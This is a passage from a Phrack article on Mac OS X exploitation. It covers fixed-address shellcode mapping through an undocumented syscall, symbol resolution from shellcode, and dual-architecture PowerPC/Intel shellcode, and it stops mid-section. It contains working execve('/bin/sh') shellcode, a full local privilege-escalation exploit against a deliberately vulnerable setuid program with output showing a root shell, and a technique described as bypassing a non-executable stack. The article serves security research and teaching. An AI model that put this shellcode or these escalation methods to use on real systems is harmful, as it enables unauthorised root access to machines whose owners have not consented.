            _                                                _
          _/B\_                                            _/W\_
          (* *)             Phrack #64 file 11             (* *)
          | - |                                            | - |
          |   |         Mac OS X wars - a XNU Hope         |   |
          |   |                                            |   |
          |   |      by nemo <nemo@felinemenace.org>       |   |
          |   |                                            |   |
          |   |                                            |   |
          (____________________________________________________)


--[ Contents

  1 - Introduction.

  2 - Local shellcode maneuvering.

  3 - Resolving symbols from Shellcode.

  4 - Architecture spanning shellcode.

  5 - Writing kernel level shellcode.
     5.1 - Local privilege escalation
     5.2 - Breaking chroot()
     5.3 - Advancements

  6 - Misc rootkit techniques.

  7 - Universal binary infection.

  8 - Cracking example - Prey

  9 - Passive malware propagation with mDNS

  10 - Kernel zone allocator exploitation.

  11 - Conclusion

  12 - References

  13 - Appendix A: Code


--[ 1 - Introduction

This paper was written in order to document my research while playing
with Mac OS X shellcode. During this process, however, the paper mutated
and evolved to cover a selection of Mac OS X related topics which will
hopefully make for an interesting read.

Due to the growing popularity of Mac OS X on Intel over PowerPC
platforms, I have mostly focused on techniques for the former. Many of
the concepts shown are still applicable on PowerPC architecture, but
their particular implementation is left as an exercise for the reader.

There are already several well written documents on PowerPC and Intel
assembly language; I will therefore make no attempt to teach you these
things.

If you have any suggestions on how to shorten/tighten the code I have
written for this paper please drop me an email with the details at:
nemo@felinemenace.org.

A tar file containing the full code listings referenced in this paper
can be found in Appendix A.


--[ 2 - Local shellcode maneuvering.

Over the years there have been many different techniques developed to
calculate valid return addresses when exploiting buffer overflows in
applications local to your system.
Unfortunately many of these techniques are now obsolete on Intel-based
Mac OS X systems with the introduction of a non-executable stack in
version 10.4 (Tiger).

In the following subsections I will discuss a few historical approaches
for calculating shellcode addresses in memory and introduce a new method
for positioning shellcode at a fixed location in the address space of a
vulnerable target process.


--[ 2.1 Historical perspective 1: Aleph1

The most widely known technique for calculating a return address is the
one shown in aleph1's "Smashing the Stack for Fun and Profit". [9]

In this paper, aleph1 simply writes a small function get_sp() shown
below.

    unsigned long get_sp(void) {
            __asm__("movl %esp,%eax");
    }

This function returns the current stack pointer (esp). aleph1 then
simply offsets from this value, in an attempt to hit the nop sled before
his shellcode on the stack. This method is imprecise, and also requires
the shellcode to be stored on the stack. This is an obvious issue if
your stack is non-executable.


--[ 2.2 Historical perspective 2: Radical Environmentalist

Another method for storing shellcode and calculating the address of it
inside another process is shown in the Radical Environmentalist paper
written by the Netric Security Group [10].

In this paper, the author shows that the execve() syscall allows full
control over the stack of the freshly executed process. Because of this,
shellcode can be stored in an environment variable, the address of which
can be calculated as a displacement from the top of the stack.

In older exploits for Mac OS X (prior to 10.4), this technique worked
quite well, since there is no non-executable stack on PowerPC.


--[ 2.3 Beating stack prot :P or whatever

In KF's paper "Non eXecutable Stack Loving on Mac OS X86" [11], the
author demonstrates a technique for removing stack protection by
returning into mprotect() in libSystem (libc) before returning into
their payload. While this technique is very useful for remote
exploitation, a more elegant solution to this problem exists for local
exploitation.

The first step to getting our shellcode in place is to get some
shellcode. There has already been significant published work in this
area. If you are interested in learning how to write shellcode for
Mac OS X for use in local privilege escalation exploits, a couple of
papers you should definitely check out are listed in the references
section: [1] and [8]. The shellcode chosen for the sample code is
described in full in section 2 of this paper.

The method which I now propose relies on the undocumented Mac OS X
system call "shared_region_map_file_np". This syscall is used at runtime
by the dynamic loader (dyld) to map widely used libraries across the
address space of every process on the system; this functionality has
many evil uses.

The file /usr/include/sys/syscall.h contains the syscall number for each
of the syscalls. Here is the appropriate line in that file which
contains our syscall.

    #define SYS_shared_region_map_file_np 299

Here is the prototype for this syscall:

    int shared_region_map_file_np(
            int fd,
            uint32_t mappingCount,
            user_addr_t mappings,
            user_addr_t slide_p
    );

The arguments to this syscall are very simple:

    fd            an open file descriptor, providing access to data
                  that we want loaded in memory.
    mappingCount  the number of mappings which we want to make from
                  the file.
    mappings      a pointer to an array of _shared_region_mapping_np
                  structs which describe each mapping (see below).
    slide_p       determines whether the syscall is allowed to slide
                  the mapping around inside the shared region of
                  memory to make it fit.
Here is the struct definition for the elements of the third argument:

    struct _shared_region_mapping_np {
            mach_vm_address_t address;
            mach_vm_size_t size;
            mach_vm_offset_t file_offset;
            vm_prot_t max_prot;
            vm_prot_t init_prot;
    };

The struct elements shown above can be explained as follows:

    address      the address in the shared region where the data
                 should be stored.
    size         the size of the mapping (in bytes).
    file_offset  the offset into the file descriptor to which we must
                 seek in order to reach the start of our data.
    max_prot     the maximum protection of the mapping. This value is
                 created by or'ing the #defines VM_PROT_EXECUTE,
                 VM_PROT_READ, VM_PROT_WRITE and VM_PROT_COW.
    init_prot    the initial protection of the mapping. Again, this is
                 created by or'ing the values mentioned above.

The following #define's describe the shared region in which we can map
our data. They show the various regions within the
0x00000000->0xffffffff address space which are available to use as
shared regions. Each region is given as a starting address, followed by
a size.

    #define SHARED_LIBRARY_SERVER_SUPPORTED
    #define GLOBAL_SHARED_TEXT_SEGMENT 0x90000000
    #define GLOBAL_SHARED_DATA_SEGMENT 0xA0000000
    #define GLOBAL_SHARED_SEGMENT_MASK 0xF0000000

    #define SHARED_TEXT_REGION_SIZE 0x10000000
    #define SHARED_DATA_REGION_SIZE 0x10000000
    #define SHARED_ALTERNATE_LOAD_BASE 0x09000000

To increase the chance that our shellcode will be stored at an address
that does not contain a NULL byte (thereby making this technique viable
for string based overflows), we position the shellcode at the end of the
last page (0x1000 bytes) which can be mapped in the region. By doing so,
our shellcode will be stored at an address of the form 0x9ffffxxx.

The following code can be used to map some shellcode into a fixed
location by opening the file "/tmp/mapme" and writing our shellcode out
to it.
It then uses the file descriptor to call "shared_region_map_file_np",
which maps the code, as well as a bunch of int3's (cc), into the shared
region.

    /*--------------------------------------------------------
     * [ sharedcode.c ]
     *
     * by nemo@felinemenace.org 2007
     */

    #include <stdio.h>
    #include <stdlib.h>
    #include <fcntl.h>
    #include <sys/syscall.h>
    #include <sys/types.h>
    #include <mach/vm_prot.h>
    #include <mach/i386/vm_types.h>
    #include <mach/shared_memory_server.h>
    #include <string.h>
    #include <unistd.h>

    #define BASE_ADDR 0x9ffff000
    #define PAGESIZE 0x1000
    #define FILENAME "/tmp/mapme"

    char dual_sc[] =
    "\x5f\x90\xeb\x60"

    // setuid() seteuid()
    "\x38\x00\x00\xb7\x38\x60\x00\x00"
    "\x44\x00\x00\x02\x38\x00\x00\x17"
    "\x38\x60\x00\x00\x44\x00\x00\x02"

    // ppc execve() code by b-r00t
    "\x7c\xa5\x2a\x79\x40\x82\xff\xfd"
    "\x7d\x68\x02\xa6\x3b\xeb\x01\x70"
    "\x39\x40\x01\x70\x39\x1f\xfe\xcf"
    "\x7c\xa8\x29\xae\x38\x7f\xfe\xc8"
    "\x90\x61\xff\xf8\x90\xa1\xff\xfc"
    "\x38\x81\xff\xf8\x38\x0a\xfe\xcb"
    "\x44\xff\xff\x02\x7c\xa3\x2b\x78"
    "\x38\x0a\xfe\x91\x44\xff\xff\x02"
    "\x2f\x62\x69\x6e\x2f\x73\x68\x58"

    // seteuid(0);
    "\x31\xc0\x50\xb0\xb7\x6a\x7f\xcd"
    "\x80"

    // setuid(0);
    "\x31\xc0\x50\xb0\x17\x6a\x7f\xcd"
    "\x80"

    // x86 execve() code / nemo
    "\x31\xc0\x50\x68\x2f\x2f\x73\x68"
    "\x68\x2f\x62\x69\x6e\x89\xe3\x50"
    "\x54\x54\x53\x53\xb0\x3b\xcd\x80";

    struct _shared_region_mapping_np {
            mach_vm_address_t address;
            mach_vm_size_t size;
            mach_vm_offset_t file_offset;
            vm_prot_t max_prot;   /* read/write/execute/COW/ZF */
            vm_prot_t init_prot;  /* read/write/execute/COW/ZF */
    };

    int main(int argc,char **argv)
    {
            int fd;
            struct _shared_region_mapping_np sr;
            char data[PAGESIZE];
            char *ptr = data + PAGESIZE - sizeof(dual_sc);

            /* Fill the whole page with int3 (0xcc). An initializer of
             * { 0xcc } would only set the first byte. */
            memset(data,0xcc,PAGESIZE);

            sr.address = BASE_ADDR;
            sr.size = PAGESIZE;
            sr.file_offset = 0;
            sr.max_prot = VM_PROT_EXECUTE | VM_PROT_READ | VM_PROT_WRITE;
            sr.init_prot = VM_PROT_EXECUTE | VM_PROT_READ | VM_PROT_WRITE;

            /* O_CREAT requires a mode argument. */
            if((fd=open(FILENAME,O_RDWR|O_CREAT,0644))==-1) {
                    perror("open");
                    exit(EXIT_FAILURE);
            }
            memcpy(ptr,dual_sc,sizeof(dual_sc));
            if(write(fd,data,PAGESIZE) != PAGESIZE) {
                    perror("write");
                    exit(EXIT_FAILURE);
            }
            if(syscall(SYS_shared_region_map_file_np,fd,1,&sr,NULL)==-1) {
                    perror("shared_region_map_file_np");
                    exit(EXIT_FAILURE);
            }
            close(fd);
            unlink(FILENAME);
            /* sr.address is 64 bits wide; cast it to match %x. */
            printf("[+] shellcode at: 0x%x.\n",
                   (unsigned int)(sr.address + PAGESIZE - sizeof(dual_sc)));
            exit(EXIT_SUCCESS);
    }
    /*---------------------------------------------------------*/

When we compile and execute this code, it prints the address of the
shellcode in memory. You can see this below.

    -[nemo@fry:~/code]$ gcc sharedcode.c -o sharedcode
    -[nemo@fry:~/code]$ ./sharedcode
    [+] shellcode at: 0x9fffff71.

As you can see the address used for our shellcode is 0x9fffff71. This
address, as expected, is free of NULL bytes.

You can test that this procedure has worked as expected by starting a
new process and connecting to it with gdb. By jumping to this address
using the "jump" command in gdb our shellcode is executed and a bash
prompt is displayed.

    -[nemo@fry:~/code]$ gdb /usr/bin/id
    GNU gdb 6.3.50-20050815 (Apple version gdb-563)
    (gdb) r
    Starting program: /usr/bin/id
    ^C[Switching to process 752 local thread 0xf03]
    0x8fe01010 in __dyld__dyld_start ()
    Quit
    (gdb) jump *0x9fffff71
    Continuing at 0x9fffff71.
    (gdb) c
    Continuing.
    -[nemo@fry:Users/nemo/code]$

In order to demonstrate how this can be used in an exploit, I have
created a trivially exploitable program:

    /*
     * exploitme.c
     */
    #include <stdio.h>
    #include <string.h>

    int main(int ac, char **av)
    {
            char buf[50] = { 0 };
            printf("%s",av[1]);
            if(ac == 2)
                    strcpy(buf,av[1]);
            return 1;
    }

Below is the exploit for the above program.
    /*
     * [ exp.c ]
     * nemo@felinemenace.org 2007
     */
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>

    #define VULNPROG "./exploitme"
    #define OFFSET 66
    #define FIXEDADDR 0x9fffff71

    int main(int ac, char **av)
    {
            char evilbuff[OFFSET + 1];
            char *args[] = {VULNPROG,evilbuff,NULL};
            char *env[] = {"TERM=xterm",NULL};
            long *ptr = (long *)&(evilbuff[OFFSET - 4]);

            memset(evilbuff,'A',OFFSET);
            *ptr = FIXEDADDR;
            evilbuff[OFFSET] = '\0';  /* terminate the argument string */
            execve(*args,args,env);
            return 1;
    }

As you can see we fill the buffer up with "A"'s, followed by our return
address calculated by sharedcode.c. After the strcpy() occurs our stored
return address on the stack is overwritten with our new return address
(0x9fffff71) and our shellcode is executed.

If we chown root /exploitme; chmod +s /exploitme; we can see that our
shellcode is mapped into suid processes, which makes this technique
feasible for local privilege escalation. Also, because we control the
memory protection on our mapping, we bypass non-executable stack
protection.

    -[nemo@fry:/]$ ./exp
    fry:/ root# id
    uid=0(root)

One limitation of this technique is that the file you are mapping into
the shared region must exist on the root filesystem. This is clearly
explained in the comment below.

    /*
     * The split library is not on the root filesystem. We don't
     * want to pollute the system-wide ("default") shared region
     * with it.
     * Reject the mapping. The caller (dyld) should "privatize"
     * (via shared_region_make_private()) the shared region and
     * try to establish the mapping privately for this process.
     */

Another limitation of this technique is that Apple have locked down this
syscall with the following lines of code:

     *
     * This system call is for "dyld" only.
     *

Luckily we can beat this magnificent protection by.... completely
ignoring it.


--[ 3 - Resolving Symbols From Shellcode

In this section I will demonstrate a method which can be used to resolve
the address of a symbol from shellcode.
This is useful in remote exploitation where you wish to access or modify
some of the functionality of the vulnerable program. This may also be
useful in calling some of the functions in a particular shared library
in the address space.

The examples in this section are written in Intel assembly, nasm syntax.
The concepts presented can easily be recreated in PowerPC assembler. If
anyone takes the time to do this let me know.

The method I will describe requires some basic knowledge about the
Mach-O object format and how symbols are stored/resolved. I will try to
be as verbose as I can, however if more research is required check out
the Mach-O Runtime document from the Apple website. [4]

The process of resolving symbols which I am describing in this section
involves locating the LINKEDIT section in memory. The LINKEDIT section
is broken up into a symbol table (symtab) and string table (strtab) as
follows:

              [ LINKEDIT SECTION ]

    low memory: 0x0
        .________________________________,
        |---(symtab data starts here.)---|
        |<nlist struct>                  |
        |<nlist struct>                  |
        |<nlist struct>                  |
        | ...                            |
        |---(strtab data starts here.)---|
        |"_mh_execute_header\0"          |
        |"dyld_start\0"                  |
        |"main"                          |
        | ...                            |
        :________________________________;
    himem : 0xffffffff

By locating the start of the string table and the start of the symbol
table relative to the address of the LINKEDIT section it is then
possible to loop through each of the nlist structures in the symbol
table and access their appropriate string in the string table. I will
now run through this technique in fine detail.

To resolve symbols we will start by locating the mach_header in memory.
This will be the start of our mapped in mach-o image. One way to find
this is to run the "nm" command on our binary and locate the address of
the __mh_execute_header symbol.

Currently on Mac OS X, the executable is simply mapped in at the start
of the first page. 0x1000.
We can verify this as follows:

    -[nemo@fry:~]$ nm /bin/sh | grep mh_
    00001000 A __mh_execute_header

    (gdb) x/x 0x1000
    0x1000: 0xfeedface

As you can see the magic number (0xfeedface) is at 0x1000. This is our
Mach-O header. The struct for this is shown below:

    struct mach_header
    {
            uint32_t magic;
            cpu_type_t cputype;
            cpu_subtype_t cpusubtype;
            uint32_t filetype;
            uint32_t ncmds;
            uint32_t sizeofcmds;
            uint32_t flags;
    };

In my shellcode I assume that the file we are parsing always has a
LINKEDIT section and a symbol table load command (LC_SYMTAB). This means
that I do not bother parsing the mach_header struct. However if you do
not wish to make this assumption, it is easy enough to loop ncmds number
of times while parsing the load commands.

Directly after the mach_header struct in memory are a bunch of
load_commands. Each of these commands begins with a "cmd" id field,
followed by the size of the command.

Therefore, we start our code by setting ecx to the address of the first
load command, directly after the mach_header struct in memory. The
mach_header struct is 0x1c bytes long, so this positions us at 0x101c.
We then null out some of the registers to use later in the code.

            ;# null out some stuff (ebx,edx,eax)
            xor     ebx,ebx
            mul     ebx

            ;# position ecx past the mach_header.
            xor     ecx,ecx
            mov     word cx,0x101c

For symbol resolution, we are only interested in LC_SEGMENT commands and
the LC_SYMTAB. In particular we are looking for the LINKEDIT LC_SEGMENT
struct. This is explained in more detail later.

The #define's for these are in /usr/include/mach-o/loader.h as follows:

    #define LC_SEGMENT 0x1  /* segment of this file to be mapped */
    #define LC_SYMTAB  0x2  /* link-edit stab symbol table info */

The LC_SYMTAB command uses the following struct:

    struct symtab_command
    {
            uint32_t cmd;
            uint32_t cmdsize;
            uint32_t symoff;
            uint32_t nsyms;
            uint32_t stroff;
            uint32_t strsize;
    };

The symoff field holds the offset from the start of the file to the
symbol table. The stroff field holds the offset to the string table.
Both the symbol table and string table are contained in the LINKEDIT
section.

By subtracting the symoff from the stroff we get the offset into the
LINKEDIT section in which to read our strings. The nsyms field can be
used as a loop count when enumerating the symtab. For the sake of this
sample code, however, I have assumed that the symbol exists and ignored
the nsyms field entirely.

We find the LC_SYMTAB command simply by looping through and checking the
"cmd" field for 0x2.

The LINKEDIT section is slightly harder to find; we need to look for a
load command with the cmd type 0x1 (segment_command), then check for the
name "__LINKEDIT" in the segname field of the struct. The
segment_command struct is shown below:

    struct segment_command
    {
            uint32_t cmd;
            uint32_t cmdsize;
            char segname[16];
            uint32_t vmaddr;
            uint32_t vmsize;
            uint32_t fileoff;
            uint32_t filesize;
            vm_prot_t maxprot;
            vm_prot_t initprot;
            uint32_t nsects;
            uint32_t flags;
    };

I will now run through an explanation of the assembly code used to
accomplish this technique.

I have used a trivial state machine to loop through each load_command
until both the symbol table and LINKEDIT virtual addresses have been
found.

First we check which type of load_command each is and then we jump to
the appropriate handler, if it is one of the types we need.

    next_header:
            cmp     byte [ecx],0x2          ;# test for LC_SYMTAB (0x2)
            je      found_lcsymtab

            cmp     byte [ecx],0x1          ;# test for LC_SEGMENT (0x1)
            je      found_lcsegment

The next two instructions add the length field of the load_command to
our pointer. This positions us over the cmd field of the next
load_command in memory. We jump back up to the next_header symbol and
compare again.

    next:
            add     ecx,[ecx + 0x4]         ;# ecx += length
            jmp     next_header

The found_lcsymtab handler is called when we have a cmd == 0x2. We make
the assumption that there's only one LC_SYMTAB. We can use the fact that
if we're here, eax hasn't been set yet and is 0.
By comparing this with edx we can see if the LINKEDIT segment has been
found. After the cmp, we update eax with the address of the LC_SYMTAB.
If both the LINKEDIT and LC_SYMTAB sections have been found, we jmp to
the "found_both" symbol, otherwise we process the next header.

    found_lcsymtab:
            cmp     eax,edx     ;# use the fact that eax is 0 to test edx.
            mov     eax,ecx     ;# update eax with current pointer.
            jne     found_both  ;# we have found LINKEDIT and LC_SYMTAB
            jmp     next        ;# keep looking for LINKEDIT

The found_lcsegment handler is very similar to the found_lcsymtab code.
However, since there are many LC_SEGMENT commands in most files we need
to be sure that we've found the __LINKEDIT section.

To do this we add 8 to the struct pointer to get to the segname[]
string. We then check 2 characters in, skipping the "__", for the 4
bytes "LINK", which is 0x4b4e494c after accounting for endian issues.

Again, we use the fact that there should only be one LINKEDIT section.
This means that if we are past the check for "LINK" edx is 0. We use
this to test eax, to see if the LC_SYMTAB command has been found.

Again if we are done we jmp to found_both, if not we jmp to "next" and
carry on from the "next_header" symbol.

    found_lcsegment:
            lea     esi,[ecx + 0x8]     ;# get pointer to name
            ;# test for "LINK"
            cmp     dword [esi + 0x2],0x4b4e494c
            jne     next                ;# it's not LINKEDIT, NEXT!
            cmp     edx,eax             ;# use zero'ed edx to test eax
            mov     edx,ecx             ;# set edx to current address
            jne     found_both          ;# we're done!
            jmp     next                ;# still need to find
                                        ;# LC_SYMTAB, continue

            ;# EDX = LINKEDIT struct
            ;# EAX = LC_SYMTAB struct

Now that we have our pointers to LINKEDIT and LC_SYMTAB, we can subtract
symtab_command.symoff from symtab_command.stroff to obtain the offset of
the strings table from the start of LINKEDIT. By adding this offset to
LINKEDIT's virtual address, we have now calculated the virtual address
of the string table in memory.
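
As a cross-check on the arithmetic just described, the same calculation
can be sketched in C. This is only an illustration: the two structs are
cut-down, hypothetical stand-ins that keep just the fields involved (the
real definitions live in <mach-o/loader.h>), and the name strtab_vaddr()
is made up for this sketch. Like the shellcode, it assumes that the
symbol table sits at the very start of LINKEDIT, so that stroff - symoff
is the string table's offset into the segment.

```c
#include <stdint.h>

/* Hypothetical cut-down view of symtab_command: only the two file
 * offsets used in the calculation are kept. */
struct symtab_view {
    uint32_t symoff;   /* file offset of the symbol table */
    uint32_t stroff;   /* file offset of the string table */
};

/* Hypothetical cut-down view of the __LINKEDIT segment_command. */
struct linkedit_view {
    uint32_t vmaddr;   /* virtual address where LINKEDIT is mapped */
};

/* Virtual address of the string table: vmaddr + (stroff - symoff).
 * Assumes the symbol table starts at the beginning of LINKEDIT. */
uint32_t strtab_vaddr(const struct linkedit_view *le,
                      const struct symtab_view *st)
{
    return le->vmaddr + (st->stroff - st->symoff);
}
```

With the made-up values vmaddr = 0x5000, symoff = 0x4000 and
stroff = 0x4300, the string table would be placed at 0x5300.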
    found_both:
            mov     edi,[eax + 0x10]    ;# EDI = stroff
            sub     edi,[eax + 0x8]     ;# EDI -= symoff
            mov     esi,[edx + 0x18]    ;# esi = VA of linkedit
            add     edi,esi             ;# add virtual address of
                                        ;# LINKEDIT to offset

The LINKEDIT section contains a list of "struct nlist" structures. Each
one corresponds to a symbol. The first union contains an offset into the
string table (which we have the VA for). In order to find the symbol we
want we simply cycle through the array and offset our string table
pointer to test the string.

    struct nlist {
            union {
    #ifndef __LP64__
                    char *n_name;
    #endif
                    int32_t n_strx;
            } n_un;
            uint8_t n_type;
            uint8_t n_sect;
            int16_t n_desc;
            uint32_t n_value;
    };

Now that we are able to walk through our nlist structs we are good to
go. However it wouldn't make sense to store the full symbol name in our
shellcode as this would make the code larger than it already is. ;/

I have chosen to steal^H^H^H^Huse skape's "compute_hash" function from
"Understanding Windows Shellcode" [5]. He explains how the code works in
his paper.

The following code shows a simple loop. First we jump down to the
"hashes" symbol, and call back up to get a pointer to our list of
hashes. We read the first hash in, and then loop through each of the
nlist structures, hashing the symbol found and comparing it against our
precomputed hash.

If the hash is unsuccessful we jump back up to "check_next_hash",
however if it's successful we continue down to the "done" symbol.

            ;# esi == constant pointer to nlist
            ;# edi == strtab base

    lookup_symbol:
            jmp     hashes
    lookup_symbol_up:
            pop     ecx
            mov     ecx,[ecx]       ;# ecx = first hash
    check_next_hash:
            push    esi             ;# save nlist pointer
            push    edi             ;# save VA of strtable
            mov     esi,[esi]       ;# *esi = offset from strtab to string
            add     esi,edi         ;# add VA of strtab

    compute_hash:
            xor     edi, edi
            xor     eax, eax
            cld
    compute_hash_again:
            lodsb
            test    al, al          ;# test if on the last byte.
            jz      compute_hash_finished
            ror     edi, 0xd
            add     edi, eax
            jmp     compute_hash_again
    compute_hash_finished:
            cmp     edi,ecx
            pop     edi
            pop     esi
            je      done
            lea     esi,[esi + 0xc] ;# Add sizeof(struct nlist)
            jmp     check_next_hash
    done:

Each hash we wish to resolve can be appended after the hashes: symbol.

            ;# hash in edi
    hashes:
            call    lookup_symbol_up
            dd      0x8bd2d84d

Now that we have the address of our symbol we're all done and can call
our function, or modify it as we need.

In order to calculate the hash for our required symbol, I have cut and
pasted some of skape's code into a little C program as follows:

    #include <stdio.h>
    #include <stdlib.h>

    char chsc[] =
    "\x89\xe5\x51\x60\x8b\x75\x04\x31"
    "\xff\x31\xc0\xfc\xac\x84\xc0\x74"
    "\x07\xc1\xcf\x0d\x01\xc7\xeb\xf4"
    "\x89\x7d\xfc\x61\x58\x89\xec\xc3";

    int main(int ac, char **av)
    {
            long (*hashstr)() = (long (*)())chsc;

            if(ac != 2) {
                    fprintf(stderr,"[!] usage: %s <string to hash>\n",*av);
                    exit(1);
            }

            /* hashstr() returns a long; print it with %lx. */
            printf("[+] Hash: 0x%lx\n",hashstr(av[1]));

            return 0;
    }

We can run this as shown below to generate our hash:

    -[nemo@fry:~/code/kernelsc]$ ./comphash _do_payload
    [+] Hash: 0x8bd2d84d

If the symbol we have resolved is a function that we wish to call there
is a little more we must do before this is possible.

Mac OS X's linker, by default, uses lazy binding for external symbols.
This means that if our intended function calls another function in an
external library, which hasn't been called elsewhere in the program
already, the dynamic linker will try to resolve the address as you call
it.
For example, a call to execve() with lazy binding will be replaced with
a call to dyld_stub_execve() as shown below:

    0x1f54 <do_payload+78>: call 0x301b <dyld_stub_execve>

At runtime this function contains one instruction:

    call 0x8fe12f70 <__dyld_fast_stub_binding_helper_interface>

This invokes dyld, which resolves the symbol and replaces this
instruction with a jmp to the real code:

    jmp 0x9003b7d0 <execve>

The only problem which this causes is that this function requires the
stack pointer to be correctly aligned, otherwise our code will crash.

To do this we simply subtract 0xc from our stack pointer before calling
our function.

Note: This will not be necessary if the program you are exploiting has
been compiled with the -bind_at_load flag.

Here is the code I have used to make the call.

    done:
            mov     eax,[esi + 0x8] ;# eax == value
            xchg    esp,edx         ;# annoyingly large
            sub     dl,0xc          ;# way to align the stack pointer
            xchg    esp,edx         ;# without null bytes.

            call    eax
            xchg    esp,edx         ;# annoyingly large
            add     dl,0xc          ;# way to fix up the stack pointer
            xchg    esp,edx         ;# without null bytes.
            ret

I have written a small sample C program to demonstrate this code in
action.

The following code has no call to do_payload(). The shellcode will
resolve the address of this function and call it.
    #include <stdio.h>
    #include <stdlib.h>

    char symresolve[] =
    "\x31\xdb\xf7\xe3\x31\xc9\x66\xb9\x1c\x10\x80\x39\x02\x74\x0a\x80"
    "\x39\x01\x74\x0d\x03\x49\x04\xeb\xf1\x39\xd0\x89\xc8\x75\x16\xeb"
    "\xf3\x8d\x71\x08\x81\x7e\x02\x4c\x49\x4e\x4b\x75\xe7\x39\xc2\x89"
    "\xca\x75\x02\xeb\xdf\x8b\x78\x10\x2b\x78\x08\x8b\x72\x18\x01\xf7"
    "\xeb\x39\x59\x8b\x09\x56\x57\x8b\x36\x01\xfe\x31\xff\x31\xc0\xfc"
    "\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf4\x39\xcf\x5f\x5e"
    "\x74\x05\x8d\x76\x0c\xeb\xde\x8b\x46\x08\x87\xe2\x80\xea\x0c\x87"
    "\xe2\xff\xd0\x87\xe2\x80\xc2\x0c\x87\xe2\xc3\xe8\xc2\xff\xff\xff"
    "\x4d\xd8\xd2\x8b"; // HASH

    void do_payload()
    {
            char *args[] = {"/usr/bin/id",NULL};
            char *env[] = {"TERM=xterm",NULL};
            printf("[+] Executing id.\n");
            execve(*args,args,env);
    }

    int main(int ac, char **av)
    {
            void (*fp)() = (void (*)())symresolve;
            fp();
            return 0;
    }

As you can see below this code works as you'd expect.

    -[nemo@fry:~]$ ./testsymbols
    [+] Executing id.
    uid=501(nemo) gid=501(nemo) groups=501(nemo)

The full assembly listing for the method shown in this section is shown
in the Appendix for this paper.

I originally worked on this method for resolving kernel symbols.
Unfortunately, the kernel jettisons (free()'s) the LINKEDIT section
after it boots. Before doing this, it writes out the mach-o file
/mach.sym containing the symbol information for the kernel. If you set
the boot flag "keepsyms" the LINKEDIT section will not be free()'ed and
the symbols will remain in kernel memory.

In this case we can use the code shown in this section, and simply scan
memory starting from the address 0x1000 until we find 0xfeedface. Here
is some assembly code to do this:

    SECTION .text
    _main:
            xor     eax,eax
            inc     eax
            shl     eax,0xc         ;# eax = 0x1000
            mov     ebx,0xfeedface  ;# ebx = 0xfeedface
    up:
            inc     eax
            inc     eax
            inc     eax
            inc     eax             ;# eax += 4
            cmp     ebx,[eax]       ;# if(*eax != ebx) {
            jnz     up              ;#      goto up }
            ret

After this is done we can resolve kernel symbols as needed.
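
Returning briefly to the symbol hash used earlier in this section: for
readers who would rather not run raw opcodes from a char array, the
compute_hash loop can also be written directly in C. The following is a
sketch of my reading of that loop (rotate the running hash right by 0xd
bits, then add the next byte of the name); the function names ror32()
and symbol_hash() are made up for this example.

```c
#include <stdint.h>

/* Rotate a 32-bit value right by n bits (0 < n < 32). */
static uint32_t ror32(uint32_t v, unsigned n)
{
    return (v >> n) | (v << (32 - n));
}

/* C rendering of the compute_hash loop: for every byte of the
 * NUL-terminated name, rotate the running hash right by 13 (0xd)
 * and then add the byte. The terminator itself is not hashed. */
uint32_t symbol_hash(const char *name)
{
    uint32_t h = 0;

    while (*name != '\0') {
        h = ror32(h, 13);
        h += (unsigned char)*name++;
    }
    return h;
}
```

Calling symbol_hash("_do_payload") gives 0x8bd2d84d, the same value the
comphash program prints and the value stored after the "hashes" symbol.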


--[ 4 - Architecture Spanning Shellcode

Since the move from PowerPC to Intel architecture it has become common
to find both PowerPC and Intel Macs running Mac OS X in the wild. On top
of this, Mac OS X 10.4 ships with virtualization technology from
Transitive called Rosetta which allows an Intel Mac to execute a PowerPC
binary. This means that even after you've finger-printed the
architecture of a machine as Intel, there's a chance a network facing
daemon might be running PowerPC code.

This poses a challenge when writing remote exploits, as incorrectly
fingerprinting the architecture of the machine will result in failure.

In order to remedy this a technique can be used to create shellcode
which executes on both Intel and PowerPC architecture. This technique
has been documented in the Phrack article of the same name as this
section [16]. I provide a brief explanation here as this technique is
used throughout the remainder of the paper.

The basic premise of this technique is to find a PowerPC instruction
which, when executed, will simply step forward one instruction. It must
do this without performing any memory access, only changing the state of
the registers. When this instruction is interpreted as Intel opcodes
however, a jump must be performed. This jump must be over the PowerPC
portion of the code and into the Intel instructions. In this way the
architecture type can be determined.

A suitable PowerPC instruction exists. This is the "rlwnm" instruction.
The following is the definition of this instruction, taken from the
PowerPC manual:

    (rlwnm) Rotate Left Word then AND with Mask (x'5c00 0000')

    rlwnm   rA,rS,rB,MB,ME          (Rc = 0)
    rlwnm.  rA,rS,rB,MB,ME          (Rc = 1)

    ,__________________________________________________________.
    |010111 |   S   |   A   |   B   |    MB    |    ME    |Rc|
    ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
    0     5 6    10 11   15 16   20 21      25 26      30 31

This is the rotate left instruction on PowerPC.
Basically, the register rS is rotated left by the number of bits given
in rB, and a mask (defined by the bits MB to ME) is applied to the
result. The result is stored in rA. No memory access is made by this
instruction regardless of the arguments given.

By using the following parameters for this instruction we can end up
with a valid and useful opcode.

    rA = 16
    rS = 28
    rB = 29
    MB = XX
    ME = XX

    rlwnm r16,r28,r29,XX,XX

This leaves us with the opcode:

    "\x5f\x90\xeb\xxx"

When this is broken down as Intel code it becomes the following
instructions:

    nasm > db 0x5f,0x90,0xeb,0xXX
    00000000 5F     pop edi         // pop a value off the stack into edi
    00000001 90     nop             // do nothing.
    00000002 EBXX   jmp short 0xXX  // jump to our payload.

Here is a small example of how this can be useful.

    char trap[] =
    "\x5f\x90\xeb\x06"      // magic arch selector
    "\x7f\xe0\x00\x08"      // trap ppc instruction
    "\xcc\xcc\xcc\xcc";     // intel: int3 int3 int3 int3

This shellcode when executed on PowerPC architecture will execute the
"trap" instruction directly below our selector code. However when this
is interpreted as Intel architecture instructions the "eb 06" causes a
short jump to the int3 instructions.

On Intel, the displacement of a short jump is added to the address of
the instruction which follows the jmp, which here is the first byte of
the PowerPC instruction. A displacement of 04 would therefore be enough
to skip the four byte trap instruction; the 06 used here lands two bytes
further on, in the middle of the int3 padding. This is harmless because
every byte of the padding is an int3, and it matches the gdb output
below, where execution stops at trap+11, directly after the int3 at
trap+10.

To verify that this multi-arch technique works, here is the output of
gdb when attached to this process on Intel architecture:

    Program received signal SIGTRAP, Trace/breakpoint trap.
    0x0000201b in trap ()
    (gdb) x/i $pc
    0x201b <trap+11>: int3

Here is the same output from a PowerPC version of this binary:

    Program received signal SIGTRAP, Trace/breakpoint trap.
